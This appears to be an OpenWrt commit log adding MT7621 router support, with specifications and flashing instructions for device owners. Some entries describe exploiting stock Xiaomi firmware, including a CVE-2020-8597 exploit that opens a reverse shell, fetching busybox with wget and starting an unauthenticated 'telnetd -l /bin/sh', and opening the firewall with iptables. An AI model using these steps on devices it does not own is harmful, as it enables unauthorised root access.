slot. NOTE: U-Boot configuration is incomplete (on some devices?). You may have to configure a working mac address before running tftp using "setenv eth0addr <mac>" Unlocking the bootloader: If you are unebale to halt boot, then the bootloader is locked. The OEM firmware locks the bootloader on every boot by setting DebugFlag to 0. Setting it to 1 is therefore only temporary when OEM firmware is installed. - Run "nvram setro uboot DebugFlag 0x1; nvram commit" in OEM firmware - Run "fw_setenv DebugFlag 0x1" in OpenWrt NOTE: OpenWrt does this automatically on first boot if necessary NOTE2: Setting the flag to 0x1 avoids the reset to 0 in known OEM versions, but this might change. WARNING: Writing anything to flash while the bootloader is locked is considered extremely risky. Errors might cause a permanent brick! Enabling management access from LAN: Temporary workaround to allow installing OpenWrt if OEM firmware has disabled LAN management: - Connect to console - Log in as "root" - Run "iptables -I INPUT -i br0 -j ACCEPT" Notes on the OEM/bootloader dual partition scheme The dual partition scheme on this device uses Image2 as a recovery image only. The device will always boot from Image1, but the bootloader might copy Image2 to Image1 under specific conditions. This scheme prevents repurposing of the space occupied by Image2 in any useful way. Validation of primary and recovery images is controlled by the variables CheckBypass, Image1Stable, and Image1Try. The bootloader sets CheckBypass to 0 and reboots if Image1 fails validation. If CheckBypass is 0 and Image1 is invalid then Image2 is copied to Image1. If CheckBypass is 0 and Image2 is invalid, then Image1 is copied to Image2. If CheckBypass is 1 then all tests are skipped and Image1 is booted unconditionally. CheckBypass is set to 1 after each successful validation of Image1. Image1Try is incremented if Image1Stable is 0, and Image2 is copied to Image1 if Image1Try is 3 or larger. But the bootloader only tests Image1Try if CheckBypass is 0, which is impossible unless the booted image sets it to 0 before failing. The system is therefore not resilient against runtime errors like failure to mount the rootfs, unless the kernel image sets CheckBypass to 0 before failing. This is not yet implemented in OpenWrt. Setting Image1Stable to 1 prevents the bootloader from updating Image1Try on every boot, saving unnecessary writes to the environment partition. Keeping an OpenWrt initramfs recovery as Image2 is recommended primarily to avoid unwanted OEM firmware boots on failure. Ref the warning above. It enables console-less recovery in case of some failures to boot from Image1. Signed-off-by: Bjørn Mork <bjorn@mork.no> |
||
Adrian Schmutzler
|
1c0e13db43 |
ramips: mt7621: use preferred logic in lib/upgrade/iodata.sh
shellcheck recommends || and && over "-a" and "-o" because the latter are not well defined. Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de> |
||
INAGAKI Hiroshi
|
88fbddb49d |
ramips: add support for I-O DATA WN-DX1200GR
I-O DATA WN-DX1200GR is a 2.4/5 GHz band 11ac (WiFi-5) router, based on MT7621A. Specification: - SoC : MediaTek MT7621A - RAM : DDR3 128 MiB - Flash : raw NAND 128 MiB - WLAN : 2.4/5 GHz 2T2R - 2.4 GHz : MediaTek MT7603E - 5 GHz : MediaTek MT7613BE - Ethernet : 10/100/1000 Mbps x5 - Switch : MediaTek MT7530 (SoC) - LEDs/keys : 2x/3x (2x buttons, 1x slide-switch) - UART : through-hole on PCB - J5: 3.3V, TX, RX, NC, GND from triangle-mark - 57600n8 - Power : 12 VDC, 1 A Flash instruction using initramfs image: 1. Boot WN-DX1200GR normally 2. Access to "http://192.168.0.1/" and open firmware update page ("ファームウェア") 3. Select the OpenWrt initramfs image and click update ("更新") button to perform firmware update 4. On the initramfs image, perform sysupgrade with the squashfs-sysupgrade image 5. Wait ~120 seconds to complete flashing Notes: - currently, mt7615e driver in mt76 doesn't fully support MT7613 (MT7663) wifi chip - the eeprom data in flash is not used by mt7615e driver and the driver reports the tx-power up to 3dBm - the correct MAC address for MT7613BE in eeprom data cannot be assigned to the phy - last 0x80000 (512 KiB) in NAND flash is not used on stock firmware - stock firmware requires "customized uImage header" (called as "combo image") by MSTC (MitraStar Technology Corp.), but U-Boot doesn't - uImage magic ( 0x0 - 0x3 ) : 0x434F4D43 ("COMC") - header crc32 ( 0x4 - 0x7 ) : with "data length" and "data crc32" - image name (0x20 - 0x37) : model ID and firmware versions - data length (0x38 - 0x3b) : kernel + rootfs - data crc32 (0x3c - 0x3f) : kernel + rootfs MAC addresses: LAN: 50:41:B9:xx:xx:08 (Ubootenv, ethaddr (text) / Factory, 0x1E000 (hex)) WAN: 50:41:B9:xx:xx:0A (Factory, 0x1E006 (hex)) 2.4GHz: 50:41:B9:xx:xx:08 (Factory, 0x4 (hex)) 5GHz: 50:41:B9:xx:xx:09 (Factory, 0x8004 (hex)) Signed-off-by: INAGAKI Hiroshi <musashino.open@gmail.com> [add check whether dflag_offset is set] Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de> |
||
Dmytro Oz
|
c2a7bb520a |
ramips: mt7621: add support for Xiaomi Mi Router 4
Xiaomi Mi Router 4 is the same as Xiaomi Mi Router 3G, except for the RAM (256Mib→128Mib), LEDs and gpio (MiNet button). Specifications: Power: 12 VDC, 1 A Connector type: barrel CPU1: MediaTek MT7621A (880 MHz, 4 cores) FLA1: 128 MiB (ESMT F59L1G81MA) RAM1: 128 MiB (ESMT M15T1G1664A) WI1 chip1: MediaTek MT7603EN WI1 802dot11 protocols: bgn WI1 MIMO config: 2x2:2 WI1 antenna connector: U.FL WI2 chip1: MediaTek MT7612EN WI2 802dot11 protocols: an+ac WI2 MIMO config: 2x2:2 WI2 antenna connector: U.FL ETH chip1: MediaTek MT7621A Switch: MediaTek MT7621A UART Serial [o] TX [o] GND [o] RX [ ] VCC - Do not connect it MAC addresses as verified by OEM firmware: use address source LAN *:c2 factory 0xe000 (label) WAN *:c3 factory 0xe006 2g *:c4 factory 0x0000 5g *:c5 factory 0x8000 Flashing instructions: 1.Create a simple http server (nginx etc) 2.set uart enable To enable writing to the console, you must reset to factory settings Then you see uboot boot, press the keyboard 4 button (enter uboot command line) If it is not successful, repeat the above operation of restoring the factory settings. After entering the uboot command line, type: setenv uart_en 1 saveenv boot 3.use shell in uart cd /tmp wget http://"your_computer_ip:80"/openwrt-ramips-mt7621-xiaomi_mir4-squashfs-kernel1.bin wget http://"your_computer_ip:80"/openwrt-ramips-mt7621-xiaomi_mir4-squashfs-rootfs0.bin mtd write openwrt-ramips-mt7621-xiaomi_mir4-squashfs-kernel1.bin kernel1 mtd write openwrt-ramips-mt7621-xiaomi_mir4-squashfs-rootfs0.bin rootfs0 nvram set flag_try_sys1_failed=1 nvram commit reboot 4.login to the router http://192.168.1.1/ Installation via Software exploit Find the instructions in the https://github.com/acecilia/OpenWRTInvasion Signed-off-by: Dmytro Oz <sequentiality@gmail.com> [commit message facelift, rebase onto shared DTSI/common device definition, bump uboot-envtools] Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de> |
||
Robert Marko
|
7a181a65f2 |
treewide: fix initramfs detection
Commit "initramfs: switch to tmpfs to fix ujail" switched initramfs to
now use tmpfs, it causes $(rootfs_type) to now return tmpfs when
running initramfs image instead of being empty.
This broke initramfs detection which is required so that when installing
on MikroTik devices firmware partition would first get erased fully
before writing.
So, lets test for $(rootfs_type) returning "tmpfs" instead.
Fixes:
|
||
Adrian Schmutzler
|
6d4382711a |
ramips: use full names for Xiaomi Mi Router devices
This aligns the device/image names of the older Xiaomi Mi Router devices with their "friendly" model and DEVICE_MODEL properties. This also reintroduces consistency with the newer devices already following that scheme. Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de> |
||
James McGuire
|
de768829a5 |
ramips: add support for D-Link DIR-2640 A1
This patch adds support for D-Link DIR-2640 A1. Specifications: * Board: AP-MTKH7-0002 * SoC: MediaTek MT7621AT * RAM: 256 MB (DDR3) * Flash: 128 MB (NAND) * WiFi: MediaTek MT7615N (x2) * Switch: 1 WAN, 4 LAN (Gigabit) * Ports: 1 USB 2.0, 1 USB 3.0 * Buttons: Reset, WPS * LEDs: Power (blue/orange), Internet (blue/orange), WiFi 2.4G (blue), WiFi 5G (blue), USB 3.0 (blue), USB 2.0 (blue) Notes: * WiFi 2.4G and WiFi 5G LEDs are wired directly to the wireless chips Installation: * D-Link Recovery GUI: power down the router, press and hold the reset button, then re-plug it. Keep the reset button pressed until the power LED starts flashing orange, manually assign a static IP address under the 192.168.0.xxx subnet (e.g. 192.168.0.2) and go to http://192.168.0.1 * Some modern browsers may have problems flashing via the Recovery GUI, if that occurs consider uploading the firmware through cURL: curl -v -i -F "firmware=@file.bin" 192.168.0.1 MAC addresses: lan factory 0xe000 *:a7 (label) wan factory 0xe006 *:aa 2.4 factory 0xe000 +1 *:a8 5.0 factory 0xe000 +2 *:a9 Seems like vendor didn't replace the dummy entries in the calibration data. Signed-off-by: James McGuire <jamesm51@gmail.com> [fix device definition title] Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de> |
||
J. Scott Heppler
|
620f9c7734 |
ramips: add support for Linksys EA7300 v2
This submission relied heavily on the work of Santiago Rodriguez-Papa <contact at rodsan.dev> Specifications: * SoC: MediaTek MT7621A (880 MHz 2c/4t) * RAM: Winbond W632GG6MB-12 (256M DDR3-1600) * Flash: Winbond W29N01HVSINA (128M NAND) * Eth: MediaTek MT7621A (10/100/1000 Mbps x5) * Radio: MT7603E/MT7615N (2.4 GHz & 5 GHz) 4 antennae: 1 internal and 3 non-deatachable * USB: 3.0 (x1) * LEDs: White (x1 logo) Green (x6 eth + wps) Orange (x5, hardware-bound) * Buttons: Reset (x1) WPS (x1) Installation: Flash factory image through GUI. This might fail due to the A/B nature of this device. When flashing, OEM firmware writes over the non-booted partition. If booted from 'A', flashing over 'B' won't work. To get around this, you should flash the OEM image over itself. This will then boot the router from 'B' and allow you to flash OpenWRT without problems. Reverting to factory firmware: Hard-reset the router three times to force it to boot from 'B.' This is where the stock firmware resides. To remove any traces of OpenWRT from your router simply flash the OEM image at this point. Signed-off-by: J. Scott Heppler <shep971@centurylink.net> |
||
Josh Bendavid
|
b5dd746cbb |
ramips: add support for D-Link DIR-2660 A1
This patch adds support for D-Link DIR-2660 A1. Specifications: * Board: AP-MTKH7-0002 * SoC: MediaTek MT7621AT * RAM: 256 MB (DDR3) * Flash: 128 MB (NAND) * WiFi: MediaTek MT7615N (x2) * Switch: 1 WAN, 4 LAN (Gigabit) * Ports: 1 USB 2.0, 1 USB 3.0 * Buttons: Reset, WPS * LEDs: Power (white/orange), Internet (white/orange), WiFi 2.4G (white), WiFi 5G (white), USB 3.0 (white), USB 2.0 (white) Notes: * WiFi 2.4G and WiFi 5G LEDs are wired directly to the wireless chips Installation: * D-Link Recovery GUI: power down the router, press and hold the reset button, then re-plug it. Keep the reset button pressed until the power LED starts flashing orange, manually assign a static IP address under the 192.168.0.xxx subnet (e.g. 192.168.0.2) and go to http://192.168.0.1 * Some modern browsers may have problems flashing via the Recovery GUI, if that occurs consider uploading the firmware through cURL: curl -v -i -F "firmware=@file.bin" 192.168.0.1 MAC addresses: lan factory 0xe000 *:a7 (label) wan factory 0xe006 *:aa 2.4 factory 0xe000 +1 *:a8 5.0 factory 0xe000 +2 *:a9 Seems like vendor didn't replace the dummy entries in the calibration data. Signed-off-by: Josh Bendavid <joshbendavid@gmail.com> [rebase onto already merged DIR-1960 A1, add MAC addresses to commit message] Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de> |
||
John Thomson
|
74438d5419 |
ramips: add support for MikroTik RouterBOARD 760iGS (hEX S)
This patch adds support for the MikroTik RouterBOARD 760iGS router. It is similar to the already supported RouterBOARD 750Gr3. The 760iGS device features an added SFP cage, and passive PoE out on port 5 compared to the RB750Gr3. https://mikrotik.com/product/hex_s Specifications: - SoC: MediaTek MT7621A - CPU: 880MHz - Flash: 16 MB - RAM: 256 MB - Ethernet: 5x 10/100/1000 Mbps - SFP cage - USB port - microSD slot Unsupported: - Beeper (requires PWM driver) - ZT2046Q (ADS7846 compatible) on SPI as slave 1 (CS1) The linux driver requires an interrupt, and pendown GPIO These are unknown, and not needed with the touchscreen only used for temperature and voltage monitoring. ads7846 hwmon: temp0 is degrees Celsius temp1 is voltage * 32 GPIOs: - 07: input passive PoE out (lan5) compatible (Mikrotik) device connected - 17: output passive PoE out (lan5) switch Installation through RouterBoot follows the usual MikroTik method https://openwrt.org/toh/mikrotik/common To boot to intramfs image in RAM: 1. Setup TFTP server to serve intramfs image. 2. Plug Ethernet cable into WAN port. 3. Unplug power, hold reset button and plug power in. Wait (~25 seconds) for beep and then release reset button. The SFP LED will be lit in RouterBoot, but will not be lit in OpenWRT. 4. Wait for a minute. Router should be running OpenWrt, check by plugging in to port 2-5 and going to 192.168.1.1. To install OpenWrt to flash: 1. Follow steps above to boot intramfs image in RAM. 2. Flash the sysupgrade.bin image with web interface or sysupgrade. 3. Once the router reboots you will be running OpenWrt from flash. OEM firmware differences: - RouterOS assigns a different MAC address for each port - The first address (E01 on the sticker) is used for wan (ether1 in OEM). - The next address is used for lan2. - The last address (E06 on the sticker) is used for sfp. [Initial port work, shared dtsi] Signed-off-by: Vince Grassia <vincenzo.grassia@zionark.com> [SFP support and GPIO identification] Signed-off-by: Luka Logar <luka.logar@iname.com> [Misc. fixes and submission] Signed-off-by: John Thomson <git@johnthomson.fastmail.com.au> [rebase, drop uart3 from state_default on 750gr3, minor commit title/message facelift] Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de> |
||
Josh Bendavid
|
11bff24b3e |
ramips: add support for D-Link DIR-1960 A1
This patch adds support for D-Link DIR-1960 A1. Given the similarity with the DIR-1760/2660 A1, this patch also introduces a common DTSI which can be shared with these devices, with support to be added in future commits. Specifications: * Board: AP-MTKH7-0002 * SoC: MediaTek MT7621AT * RAM: 256 MB (DDR3) * Flash: 128 MB (NAND) * WiFi: MediaTek MT7615N (x2) * Switch: 1 WAN, 4 LAN (Gigabit) * Ports: 1 USB 3.0 * Buttons: Reset, WPS * LEDs: Power (white/orange), Internet (white/orange), WiFi 2.4G (white), WiFi 5G (white), USB 3.0 (white) Notes: * WiFi 2.4G and WiFi 5G LEDs are wired directly to the wireless chips Installation: * D-Link Recovery GUI: power down the router, press and hold the reset button, then re-plug it. Keep the reset button pressed until the power LED starts flashing orange, manually assign a static IP address under the 192.168.0.xxx subnet (e.g. 192.168.0.2) and go to http://192.168.0.1 * Some modern browsers may have problems flashing via the Recovery GUI, if that occurs consider uploading the firmware through cURL: curl -v -i -F "firmware=@file.bin" 192.168.0.1 MAC addresses: lan factory 0xe000 *:EB (label) wan factory 0xe006 *:EE 2.4 factory 0xe000 +1 *:EC 5.0 factory 0xe000 +2 *:ED Seems like vendor didn't replace the dummy entrys in the calibration data. Signed-off-by: Josh Bendavid <joshbendavid@gmail.com> [fix whitespace issues, create patch to merge DIR-1960 first, move special WiFi MAC settings to DTS, extend commit message] Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de> |
||
Santiago Rodriguez-Papa
|
ed087cba8a |
ramips: add support for Linksys EA7300 v1
Specifications: * SoC: MediaTek MT7621A (880 MHz 2c/4t) * RAM: Nanya NT5CC128M16IP-DIT (256M DDR3-1600) * Flash: Macronix MX30LF1G18AC-TI (128M NAND) * Eth: MediaTek MT7621A (10/100/1000 Mbps x5) * Radio: MT7615N (2.4 GHz & 5 GHz) 4 antennae: 1 internal and 3 non-deatachable * USB: 3.0 (x1) * LEDs: White (x1 logo) Green (x6 eth + wps) Orange (x5, hardware-bound) * Buttons: Reset (x1) WPS (x1) Everything works! Been running it for a couple weeks now and haven't had any problems. Please let me know if you run into any. Installation: Flash factory image through GUI. This might fail due to the A/B nature of this device. When flashing, OEM firmware writes over the non-booted partition. If booted from 'A', flashing over 'B' won't work. To get around this, you should flash the OEM image over itself. This will then boot the router from 'B' and allow you to flash OpenWRT without problems. Reverting to factory firmware: Hard-reset the router three times to force it to boot from 'B.' This is where the stock firmware resides. To remove any traces of OpenWRT from your router simply flash the OEM image at this point. Signed-off-by: Santiago Rodriguez-Papa <contact@rodsan.dev> [use v1 only, minor DTS adjustments, use LINKSYS_HWNAME and add it to DEVICE_VARS, wrap DEVICE_PACKAGES, adjust commit message/title] Signed-off-by: Adrian Schmutzler <freifunk@adrianschmutzler.de> |
||
Bjørn Mork
|
c1794d653c |
ramips: add support for ZyXEL WAP6805 (Altibox WiFi+)
Hardware -------- SoC: MediaTek MT7621ST WiFi: MediaTek MT7603 Quantenna QT3840BC Flash: 128M NAND RAM: 64M LED: Dual colour red and green BTN: Reset WPS Eth: 4 x 10/100/1000 connected to MT7621 internal switch MT7621 RGMII port connected to Quantenna module GPIO: Power/reset of Quantenna module Quantenna module ---------------- The Quantenna QT3840BC (or QV840) is a separate SoC running another Linux installation. It is mounted on a wide mini-PCIe form factor module, but is connected to the RGMII port of the MT7621. It loads both a second uboot stage and an os image from the MT7621 using tftp. The module is configured using Quantenna specific RPC calls over IP, using 802.1q over the RGMII link to support multiple SSIDs. There is no support for using this module as a WiFi device in OpenWrt. A package with basic firmware and management tools is being prepared. Serial ports ------------ Two serial ports with headers: RRJ1 - 115200 8N1 - Connected to the Quantenna console J1 - 57600 8N1 - Connected to the MT7621 console Both share pinout with many other Zyxel/Mitrastar devices: 1 - NC (VDD) 2 - TX 3 - RX 4 - NC (no pin) 5 - GND Dual system partitions ---------------------- The vendor firmware and boot loader use a dual partition scheme storing a counter in the header of each partition. The partition with the highest number will be selected for boot. OpenWrt does not support this scheme and will always use the first OS partition. It will reset both counters to zero the first time sysupgrade is run, making sure the first partition is selected by the boot loader. Installation from vendor firmware --------------------------------- 1. Run a DHCP server. The WAP6805 is configured as a client device and does not have a default static IP address. Make a note of which address it is assigned 2. tftp the OpenWrt initramfs-kernel.bin image to this address. Wait for the WAP6805 to reboot. 3. ssh to the OpenWrt initramfs system on 192.168.1.1. Make a backup of all mtd partitions now. The last used OEM image is still present in either "Kernel" or "Kernel2" at this point, and can be restored later if you save a copy. 4. sysupgrade to the OpenWrt sysupgrade.bin image. Installation from U-Boot ------------------------ This requires serial console access 1. Copy the OpenWrt initramfs-kernel.bin image as "ras.bin" to your tftp server directory. Configure the server address as 192.168.0.33/24 2. Hit ESC when the message "Hit ESC key to stop autoboot" appears 3. Type "ATGU" + Enter, and then "2" immediately after pressing enter. 4. Answer Y to the question "Erase Linux in Flash then burn new one. Are you sure?", and answer the address/filename questions. Defaults: Input device IP (192.168.0.2) Input server IP (192.168.0.33) Input Linux Kernel filename ("ras.bin") 5. Wait until after you see the message "Done!" and power cycle the device. It will hang after flashing. 6. Continue with step 3 and 4 from the vendor firmware procedure. Notes on the WAP6805 U-Boot --------------------------- The bootloader has been modified with both ZyXELs zyloader and the device specific dual partition scheme. These changes appear to have broken a few things. The zyloader shell claims to support a number of ZyXEL AT commands, but not all of them work. The image selection scheme is unreliable and inconsistent. A limited U-Boot menu is available - and used by the above U-Boot install procedure. But direct booting into an uploaded image does not work, neither with ram nor with flash. Flashing works, but requires a hard reset after it is finished. Reverting to OEM firmware ------------------------- The OEM firmware can be restored by using mtd write from OpenWrt, flashing it to the "Kernel" partition. E.g. ssh root@192.168.1.1 "mtd -r -e Kernel write - Kernel" < oem.bin OEM firmwares for the WAP6805 are not avaible for public download, so a backup of the original installation is required. See above. Alternatively, firmware for the WAP6806 (Armor X1) may be used. This is exactly the same hardware. But the branding features do obviously differ. LED controller -------------- Hardware implementation is unknown. The dual-color LED is controlled by 3 GPIOs: 4: red 7: blinking green 13: green Enabling both red and green makes the LED appear yellow. The boot loader enables hardware blinking, causing the green LED to blink slowly on power-on, until the OpenWrt boot mode starts a faster software blink. Signed-off-by: Bjørn Mork <bjorn@mork.no> [fix alphabetic sorting for image build statement] Signed-off-by: Petr Štetiar <ynezz@true.cz> |
||
Emir Efe Kucuk
|
53a1fede1f |
ramips: Add support for Xiaomi Mi Router(Black,R2100)
The Xiaomi Mi Router AC2100 is a *black* cylindrical router that shares many
characteristics (apart from its looks and the GPIO ports) with the 6-antenna
*white* "Xiaomi Redmi Router AC2100"
See the visual comparison of the two routers here:
https://github.com/emirefek/openwrt-R2100/raw/imgcdn/rm2100-r2100.jpg
Specification of R2100:
- CPU: MediaTek MT7621A
- RAM: 128 MB DDR3
- FLASH: 128 MB ESMT NAND
- WIFI: 2x2 802.11bgn (MT7603)
- WIFI: 4x4 802.11ac (MT7615)
- ETH: 3xLAN+1xWAN 1000base-T
- LED: Power, WAN in Yellow and Blue
- UART: On board (Don't know where is should be confirmed by anybody else)
- Modified u-boot
Hacking of official firmware process is same at both RM2100 and R2100.
Thanks to @namidairo
Here is the detailed guide Hack: https://github.com/impulse/ac2100-openwrt-guide
Guide is written for MacOS but it will work at linux.
needed packages: python3(with scapy), netcat, http server, telnet client
1. Run PPPoE&exploit to get nc and wget busybox, get telnet and wget firmware
2. mtd write openwrt-ramips-mt7621-xiaomi_mi-router-ac2100-kernel1.bin kernel1
3. nvram set uart_en=1
4. nvram set bootdelay=5
5. nvram set flag_try_sys1_failed=1
6. nvram commit
7. mtd -r write openwrt-ramips-mt7621-xiaomi_mi-router-ac2100-rootfs0.bin rootfs0
other than these I specified in here. Everything is same with:
|
||
Jan Hoffmann
|
b1d5ab1a69 |
ramips: add support for NETGEAR WAC124
The WAC124 hardware appears to be identical to R6260/R6350/R6850. SoC: MediaTek MT7621AT RAM: 128M DDR3 FLASH: 128M NAND (Macronix MX30LF1G18AC) WiFI: MediaTek MT7603 bgn 2T2R MediaTek MT7615 nac 4T4R ETH: SoC Integrated Gigabit Switch (1x WAN, 4x LAN) USB: 1x USB 2.0 BTN: Reset, WPS LED: Power, Internet, WiFi, USB (all green) Installation: The factory image can be flashed from the stock firmware web interface or using nmrpflash. With nmrpflash it is also possible to revert to stock firmware. Signed-off-by: Jan Hoffmann <jan@3e8.eu> |
||
Pawel Dembicki
|
221d8a1c60 |
ramips: mt7621: add support for NETGEAR WAC104
NETGEAR WAC104 is an AP based on castrated R6220, without WAN port and USB. SoC: MediaTek MT7621ST RAM: 128M DDR3 FLASH: 128M NAND WiFi: MediaTek MT7612EN an+ac MediaTek MT7603EN bgn ETH: MediaTek MT7621ST (4x LAN) BTN: 1x Connect (WPS), 1x WLAN, 1x Reset LED: 7x (3x GPIO controlled) Installation: Login to netgear webinterface and flash factory.img Back to stock: Use nmrpflash to revert stock image. Signed-off-by: Pawel Dembicki <paweldembicki@gmail.com> |
||
Richard Huynh
|
f3792690c4 |
ramips: Add support for Xiaomi Redmi Router AC2100 (RM2100)
Specification: - CPU: MediaTek MT7621A - RAM: 128 MB DDR3 - FLASH: 128 MB ESMT NAND - WIFI: 2x2 802.11bgn (MT7603) - WIFI: 4x4 802.11ac (MT7615) - ETH: 3xLAN+1xWAN 1000base-T - LED: Power, WAN, in Amber and White - UART: On board near ethernet, opposite side from power - Modified u-boot Installation: 1. Run linked exploit to get shell, startup telnet and wget the files over 2. mtd write openwrt-ramips-mt7621-xiaomi_rm2100-squashfs-kernel1.bin kernel1 3. nvram set uart_en=1 4. nvram set bootdelay=5 5. nvram set flag_try_sys1_failed=1 6. nvram commit 7. mtd -r write openwrt-ramips-mt7621-xiaomi_rm2100-squashfs-rootfs0.bin rootfs0 Restore to stock: 1. Setup PXE and TFTP server serving stock firmware image (See dhcp-boot option of dnsmasq) 2. Hold reset button down before powering on and wait for flashing amber led 3. Release reset button 4. Wait until status led changes from flashing amber to white Notes: This device has dual kernel and rootfs slots like other Xiaomi devices currently supported (mir3g, etc.) thus, we use the second slot and overwrite the first rootfs onwards in order to get more space. Exploit and detailed instructions: https://openwrt.org/toh/xiaomi/xiaomi_redmi_router_ac2100 An implementation of CVE-2020-8597 against stock firmware version 1.0.14 This requires a computer with ethernet plugged into the wan port and an active PPPoE session, and if successful will open a reverse shell to 192.168.31.177 on port 31337. As this shell is somewhat unreliable and likely to be killed in a random amount of time, it is recommended to wget a static compiled busybox binary onto the device and start telnetd with it. The stock telnetd and dropbear unfortunately appear inoperable. (Disabled on release versions of stock firmware likely) Ie. wget https://yourip/busybox-mipsel -O /tmp/busybox chmod a+x /tmp/busybox /tmp/busybox telnetd -l /bin/sh Tested-by: David Martinez <bonkilla@gmail.com> Signed-off-by: Richard Huynh <voxlympha@gmail.com> |